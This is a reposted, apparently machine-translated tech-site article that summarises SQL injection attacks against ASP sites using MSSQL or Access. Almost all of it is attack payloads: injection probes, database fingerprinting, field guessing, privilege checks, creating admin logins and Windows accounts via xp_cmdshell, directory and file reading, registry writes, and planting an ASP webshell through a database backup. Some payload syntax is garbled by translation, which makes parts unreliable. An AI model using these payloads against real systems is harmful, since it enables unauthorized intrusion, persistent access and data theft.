2. Tech
  3. Summarize the method used in ASP injection

Summarize the method used in ASP injection

xiaoxiao2021-03-05  26

1. Judging whether there is an injection

; and 1 = 1

And 1 = 2

2. Preliminary judgment is MSSQL; and user> 0

3. Judging the database system; and (select count (*) from sysobjects> 0 mssql; and (select count (*) from msysobject> 0 Access

4. Injection parameters are character 'and [query conditions] and' '='

5. The 'and'% 25 '=' of the "AND [query condition] and '% 25' = '

6. Guess the database; and (select count (*) from [Database Name])> 0

7. Guess fields; and (select count "from database name)> 0

8. Guess field record length; And (select top 1 len (field name) from database name)> 0

9. (1) ASCII value (Access) of the guess field; and (SELECT TOP 1 ASC (MID (Field Name, 1, 1)) from Database Name)> 0

(2) Guess field ASCII (MSSQL); and (Substring 1 Unicode (Substring (Field Name, 1, 1)) from Database Name)> 0

10. Test permission structure (MSSQL); and 1 = (select is_srvrolemember ('sysadmin')); -; and 1 = (select is_srvrolemember ('ServerAdmin')); -; and 1 = (select is_srvrolemember) ')); -; and 1 = (SELECT IS_SRVROLEMEMBER); -; and 1 = (select is_srvrolemember (' DiskAdmin ')); -; and 1 = (select is_srvrolemember (' bulkadmin ') ); -; AND 1 = (select is_member ('db_owner'));

11. Add account mssql and systems; exec master.dbo.sp_addlogin username; -; exec master.dbo.sp_password null, username, password; -; exec master.dbo.sp_addsrvrolemember sysadmin username; -; exec master. dbo.xp_cmdshell 'net user username password / workstations: * / times: all / passwordchg: yes / passwordreq: yes / active: yes / add'; -; exec master.dbo.xp_cmdshell 'net user username password / add'; -; Exec master.dbo.xp_cmdshell 'net localgroup administrators username / add';

12. (1) Traversal Directory; Create Table Dirs (Paths Varchar (100), ID INT); Insert Dirs Exec Master.dbo.xp_dirtree 'C: /'; and (Select Top 1 Paths from DIRS)> 0; SELECT TOP 1 PATHS from DIRS WHERE PATHS NOT IN ('Friendly Paths'))>) (2) Traversing Directory; Create Table Temp (ID NVARCHAR (255), Num1 Nvarchar (255), Num2 NVARCHAR (255), Num3 nvarchar (255)); -; INSERT TEMP EXEC MASTER.DBO.XP_AVAILAMEDIA; - Get all current drives; INSERT INTO TEMP (ID) Exec master.dbo.xp_subdirs 'c: /'; - Get subdirectory list Insert INTO TEMP (ID, NUM1) EXEC MASTER.DBO.XP_DIRTREC MASTER.DBO.XP_DIRTREE 'C: /'; - Get all subdirectories directory tree structure; INSERT INTO TEMP (ID) Exec master.dbo.xp_cmdshell 'Type C: / Web /index.asp'; - View the contents of the file

13.Mssql stored procedure XP_ReGenumValues ​​Register the table Root key, subkey; EXEC XP_REGENUMVALUES 'HKEY_LOCAL_MACHINE', 'SOFTWARE / Microsoft / Windows / CurrentVersion / Run' Returns all key value XP_regread root keys, sub-keys, Key value name; EXEC XP_REGREAD 'HKEY_LOCAL_MACHINE', 'SOFTWARE / Microsoft / Windows / CurrentVersion', 'CommonFilesDir' Returns the value of the XP_REGWRITE root key, subkey, value name, value type, value value type, and two reg_sz represent characters type, REG_DWORD represents an integer; exec xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE / Microsoft / Windows / CurrentVersion', 'TestValueName', 'reg_sz', 'hello' into the registry xp_regdeletevalue root key, sub key value name exec xp_regdeletevalue ' HKEY_LOCAL_MACHINE ',' SOFTWARE / Microsoft / Windows / CurrentVersion ',' TestValueName 'delete a value xp_regdeletekey' HKEY_LOCAL_MACHINE ',' SOFTWARE / Microsoft / Windows / CurrentVersion / Testkey 'delete key, including all the value of this key

14.MSSQL's Backup Create WebShelluse Modelcreate Table CMD (Str Image); Insert INTO CMD (STR) VALUES ('

'); Backup Database Model to Disk =' c: /l.asp ';

15.msql built-in function; and (select @@ version)> 0 get the version number of Windows; and user_name () = 'dbo' determines whether the connection user of the current system is SA; and (select user_name ())> 0 burst System connection user; and (select db_name ()> 0 Get currently connected database 16. Simple WebShelluse Modelcreate Table CMD (Str Image); Insert Into Cmd (Str) Values

'); Backup Database Model to Disk =' g: /wwward/l.asp ';

When requested, like this: http://ip/l.asp? C = DIR

Prerequisites Require tools: SQL Query Analyzer and SQLEXEC SUNX VERSION

1. The way to remove the XP_cmdshell extension process is to use the following statement:

if exists (select * from dbo.sysobjects where id = object_id (N '[dbo]. [xpcmdshell]') and OBJECTPROPERTY (id, N'IsExtendedProc ') = 1) exec sp_dropextendedproc N' [dbo]. [xp_cmdshell] '

2. The way to add the XP_cmdshell extension process is to use the following statement:

(1) SQL Query Analyzer

sp_addextendedProc XP_cmdshell, @ dllname = 'xplog70.dll'

(2) First fill in the% s in the Format option of SQLEXEC Sunx Version, enter in the CMD option

sp_addextendedProc 'XP_cmdshell', 'XPSQL70.DLL'

Removal

sp_dropextendedProc 'XP_cmdshell'

(3) MSSQL2000

Sp_addextendedProc 'XP_cmdshell', 'XPLog70.dll'

转载请注明原文地址:https://www.9cbs.com/read-36423.html

9cbs

New Post(0)